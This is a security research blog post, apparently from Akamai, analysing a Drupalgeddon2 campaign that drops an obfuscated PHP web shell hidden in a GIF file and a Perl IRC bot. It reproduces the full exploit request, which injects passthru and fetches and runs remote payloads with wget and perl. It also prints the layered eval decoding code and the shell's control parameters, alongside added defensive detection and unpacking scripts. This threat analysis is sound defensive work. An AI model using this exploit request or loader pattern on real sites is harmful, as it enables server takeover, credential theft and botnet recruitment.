Drupalgeddon2 still used in attack campaigns

While examining Akamai's network attack logs, I noticed an attack campaign leveraging Drupalgeddon2. Drupalgeddon2 is an unauthenticated remote code execution vulnerability (CVE-2018-7600) in the Drupal CMS platform that was patched in March 2018.

I observed an attack that is designed to run code embedded inside a .gif file. While embedding code in an image file isn't a new attack method, I haven't seen this method in quite some time.

The attack traffic doesn't appear to be widespread at this time, nor does it appear to be specifically targeting a single industry vertical. Currently, the attack traffic seems to be directed towards a random assortment of high-profile websites.

The code I will be examining is embedded in the file index.inc.gif, which appears to be hosted on a compromised bodysurfing website located in Brazil. A closer look at the request in the logs on my system shows the commands they're attempting to execute:

91.121.160.194 REDACTED /

q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=chmod%20-R%20755%20.;mv%20.htaccess%20htx;rm%20-fr%20*php.*;wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;cd%20sites/default/files/;chmod%20-R%20755%20.;rm%20-fr%20.htaccess;wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;wget%20http://REDACTED/media/favicon/ht2%20-O%20.htaccess;cd%20/tmp;wget%20http://REDACTED/media/favicon/mild.txt%20-O%20mild.txt;perl%20mild.txt;rm%20-fr%20mild* Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31

The request above has the following commands being passed to the passthru() function:

1. chmod -R 755 .;

2. mv .htaccess htx;

3. rm -fr *php.*;

4. wget http://REDACTED/media/favicon/index.inc.gif -O index.old.php;

5. cd sites/default/files/;chmod -R 755 .;

6. rm -fr .htaccess;

7. wget http://REDACTED/media/favicon/index.inc.gif -O index.old.php;

8. wget http://REDACTED/media/favicon/ht2 -O .htaccess; cd /tmp;

9. wget http://REDACTED/media/favicon/mild.txt -O mild.txt;perl mild.txt;

10. rm -fr mild*
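A way to pick requests like the one above out of web logs, as an added example that is not part of the original post: it parses the query string, flags any Drupal render-array property (a '#' key) arriving as a request parameter, notes which PHP function is named as the callback, and splits the #markup value back into the command list shown above. The LOGGED_QUERY constant is the query string from the logged request, with the host redacted as on the page.

```python
from urllib.parse import unquote

# Drupal render-array properties that Drupalgeddon2 payloads smuggle in through Form API
# input. The callback-taking ones are what turn a request parameter into code execution.
CALLBACK_PROPERTIES = {"#post_render", "#pre_render", "#lazy_builder", "#access_callback"}
PHP_EXEC_FUNCS = {"passthru", "system", "exec", "shell_exec", "popen", "proc_open", "assert"}

def analyse_query(query):
    """Flag render-array injection in a URL query string.

    Returns every '#' property found in a parameter name, the PHP functions named as
    callbacks, and the shell commands carried in a #markup value (split on ';').
    """
    hits = {"render_props": [], "exec_funcs": [], "commands": []}
    for part in query.split("&"):               # split by hand so ';' is never a separator
        raw_key, _, raw_value = part.partition("=")
        key, value = unquote(raw_key), unquote(raw_value)
        # name[#post_render][] -> ['name', '#post_render', '', '']
        props = [p for p in key.replace("]", "[").split("[") if p.startswith("#")]
        hits["render_props"].extend(props)
        for prop in props:
            if prop in CALLBACK_PROPERTIES and value.strip() in PHP_EXEC_FUNCS:
                hits["exec_funcs"].append(value.strip())
        if "#markup" in props:
            hits["commands"].extend(c.strip() for c in value.split(";") if c.strip())
    hits["suspicious"] = bool(hits["render_props"])   # no legitimate form posts '#' keys
    return hits

# The query string of the logged request quoted above (host redacted as on the page).
LOGGED_QUERY = (
    "q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]="
    "chmod%20-R%20755%20.;mv%20.htaccess%20htx;rm%20-fr%20*php.*;"
    "wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;"
    "cd%20sites/default/files/;chmod%20-R%20755%20.;rm%20-fr%20.htaccess;"
    "wget%20http://REDACTED/media/favicon/index.inc.gif%20-O%20index.old.php;"
    "wget%20http://REDACTED/media/favicon/ht2%20-O%20.htaccess;cd%20/tmp;"
    "wget%20http://REDACTED/media/favicon/mild.txt%20-O%20mild.txt;perl%20mild.txt;rm%20-fr%20mild*"
)

if __name__ == "__main__":
    for cmd in analyse_query(LOGGED_QUERY)["commands"]:
        print(cmd)
```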

The commands clean up any previous installations and then replace any .htaccess configurations with versions that have less restrictive settings. Two different files are then downloaded and executed. The first, index.inc.gif, contains obfuscated PHP code. It starts with a GIF header, but the rest of the file is PHP code obscured using gzip compression, rot13, and base64 encoding. The Linux file command identifies it as a GIF image.

$ file index.inc.gif

index.inc.gif: GIF image data, version 89a, 16129 x 16129

$ sha256sum index.inc.gif

e18bf4ddee0b0db77541f3a3ea52d3bbe8fa943dd0ca3f573572fea22533afbe index.inc.gif 

Examining the PHP code we find a block of gz compressed and base64 encoded data.

And an array of characters used in a substitution cipher:

$eAdLdAa = array('C','P','Q','T','U','M','V','h','E','L','l','0','K','8','C','l','a','U','D','e','4','I','m','1','5','s','b','R','Y','O','u','W','X','Z','+','c','@','d','3','r','F',')','B','y','C','J','q','G','#','S','o','H','4','A','i','j','t','v','w','x','z','g','%','(','$','_','+','2','x','(','f','6','j','k','n','p','*','9','N','1','3','3','7',';'); 

And then the PHP code to build the command string to decode the malware block:

$ccUdcaL = $eAdLdAa[29].$eAdLdAa[56].$eAdLdAa[23].$eAdLdAa[80].$eAdLdAa[63].$eAdLdAa[61].$eAdLdAa[33].$eAdLdAa[21].$eAdLdAa[74].$eAdLdAa[40];
$AAiio = $eAdLdAa[8].$eAdLdAa[57].$eAdLdAa[53].$eAdLdAa[15].$eAdLdAa[63].$eAdLdAa[49].$eAdLdAa[56].$eAdLdAa[27].$eAdLdAa[65].$eAdLdAa[39];
$AAiSo = $eAdLdAa[9].$eAdLdAa[53].$eAdLdAa[56].$eAdLdAa[19].$eAdLdAa[69].$eAdLdAa[42].$eAdLdAa[16].$eAdLdAa[25].$eAdLdAa[19].$eAdLdAa[71];
$Aecddad = $eAdLdAa[15].$eAdLdAa[53].$eAdLdAa[56].$eAdLdAa[8].$eAdLdAa[69].$eAdLdAa[25].$eAdLdAa[3].$eAdLdAa[39].$eAdLdAa[65].$eAdLdAa[39];
$cdaeLAL = $eAdLdAa[20].$eAdLdAa[65].$eAdLdAa[18].$eAdLdAa[8].$eAdLdAa[0].$eAdLdAa[29].$eAdLdAa[37].$eAdLdAa[19].$eAdLdAa[63];
$AHAAo = $eAdLdAa[29].$eAdLdAa[56].$eAdLdAa[23].$eAdLdAa[80].$eAdLdAa[63].$eAdLdAa[47].$eAdLdAa[60].$eAdLdAa[54].$eAdLdAa[74].$eAdLdAa[40];
$oSSHo = $AAiio.$ccUdcaL.$Aecddad.$AHAAo.$AAiSo.$cdaeLAL.'$SSooA'.$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[41].$eAdLdAa[83];
return EvAl($oSSHo);

The final return EvAl($oSSHo) statement evaluates the assembled string, which is the command below; it decodes the base64-encoded malware stored in the $database variable:

EvAL(StR_rOt13(gZInFlAtE(sTr_rOt13(GzinFLAte(Base64_DECOde($SSooA))))));

Once the base64_decode, gzinflate and str_rot13 layers are peeled off and the result is executed by eval(), the malware turns out to contain multiple functions hiding behind a typical defacement page.
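The same unpacking done statically, as an added example rather than code from the original post: it rebuilds the eval() argument from the substitution table and index runs shown above without executing anything, then peels the layers that string names (base64, raw DEFLATE, rot13, raw DEFLATE, rot13) off a payload. The SAMPLE_BLOB is a constructed stand-in built by pack_payload, not the real $SSooA data.

```python
import base64
import codecs
import zlib

# Substitution table copied from index.inc.gif (the $eAdLdAa array shown above).
TABLE = ['C','P','Q','T','U','M','V','h','E','L','l','0','K','8','C','l','a','U','D','e',
         '4','I','m','1','5','s','b','R','Y','O','u','W','X','Z','+','c','@','d','3','r',
         'F',')','B','y','C','J','q','G','#','S','o','H','4','A','i','j','t','v','w','x',
         'z','g','%','(','$','_','+','2','x','(','f','6','j','k','n','p','*','9','N','1',
         '3','3','7',';']

# Index runs from the six concatenation statements, in the order $oSSHo joins them.
PIECES = [
    [8, 57, 53, 15, 63, 49, 56, 27, 65, 39],   # $AAiio
    [29, 56, 23, 80, 63, 61, 33, 21, 74, 40],  # $ccUdcaL
    [15, 53, 56, 8, 69, 25, 3, 39, 65, 39],    # $Aecddad
    [29, 56, 23, 80, 63, 47, 60, 54, 74, 40],  # $AHAAo
    [9, 53, 56, 19, 69, 42, 16, 25, 19, 71],   # $AAiSo
    [20, 65, 18, 8, 0, 29, 37, 19, 63],        # $cdaeLAL
]

def recover_decoder_call():
    """Rebuild the string the loader hands to eval(), without executing any of it."""
    body = "".join(TABLE[i] for piece in PIECES for i in piece)
    return body + "$SSooA" + TABLE[41] * 6 + TABLE[83]

def rot13_bytes(data):
    # str_rot13() shifts ASCII letters only; latin-1 keeps every other byte intact.
    return codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")

def inflate(data):
    return zlib.decompress(data, -15)          # gzinflate() = raw DEFLATE, no zlib header

def unpack_payload(blob):
    """Peel the layers the recovered call names: base64 -> inflate -> rot13 -> inflate -> rot13."""
    return rot13_bytes(inflate(rot13_bytes(inflate(base64.b64decode(blob))))).decode()

def pack_payload(php_source):
    """Inverse of unpack_payload; used only to build a constructed sample for the test."""
    def deflate(data):
        c = zlib.compressobj(wbits=-15)
        return c.compress(data) + c.flush()
    return base64.b64encode(deflate(rot13_bytes(deflate(rot13_bytes(php_source.encode()))))).decode()

# Constructed stand-in for the real $SSooA blob, which is not reproduced here.
SAMPLE_BLOB = pack_payload("<?php echo 'constructed sample'; ?>")
```

Running unpack_payload on a blob lifted from a real sample yields the PHP source for inspection; nothing in the chain is evaluated.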

Supplying a GET or a POST request with the following parameters opens up some obscure functionality built into the defacement page. While the functionality is obscured on the server-side, there are no fields or form inputs client-side to hide these other abilities in the malware. I have created a table below to describe the required request parameters for each function.

Features and Functions

Request Type   Variable   Function
GET            cpx        Scan local files for credentials
GET            scamx      Send email with credentials
POST           htx        Replace .htaccess file
GET            configx    Display MySQL my.cnf configuration files
GET            url        Execute a remote file that is gz compressed and base64 encoded
GET            info       Show system information like uid/uname -a
GET            sempakz    Web shell (broken) / File upload
POST           command    Web shell
GET/POST       shx        Web shell
POST           newname    Rename files

For example, a request with the query string "?shx=uptime;uname%20-a", which runs the UNIX commands that display system uptime and kernel version, returns the output of both commands in the HTTP response.

The second piece of malware found in the attack is stored in mild.txt. The file contains a Perl script. The code isn't obfuscated, and like many other pieces of malware, it uses Internet Relay Chat (IRC) for its command and control structure. It has various features such as (D)DoS and RAT functionality. It is configured to connect to a now-defunct IRC server and to join the channel #FULLMAGIC[ where it can receive commands. This piece of code has been widely shared and modified by the criminal Internet underground.

$ file mild.txt

mild.txt: a /usr/bin/perl script executable (binary data)

$ shasum mild.txt

0ef7f63d746c34819d21057bd58b02781777bb29 mild.txt

As you can see in the above image, there are various tools to attack, gather information, and control the infected host. Among the more interesting commands is the SQL flood command. It simply sends generic HTTP GET / requests to MySQL's default port of 3306 on the specified target.

Conclusion

Critical vulnerabilities will be targeted, even if their public disclosure date is over a year old. When the vulnerability's exploitation is simple, which is the case with Drupalgeddon2, attackers will automate the process of scanning, exploitation, and infection when there are poorly maintained and forgotten systems. This creates a problem for enterprise operations and web administrators, as these old forgotten installs are often connected to other critical systems -- creating a pivot point on the network.

Maintaining patches in a timely fashion, as well as properly decommissioning servers if they're no longer being used is the best preventative measure that administrators and security teams can take. 

Article Link: https://blogs.akamai.com/sitr/2019/10/drupalgeddon2-still-used-in-attack-campaigns.html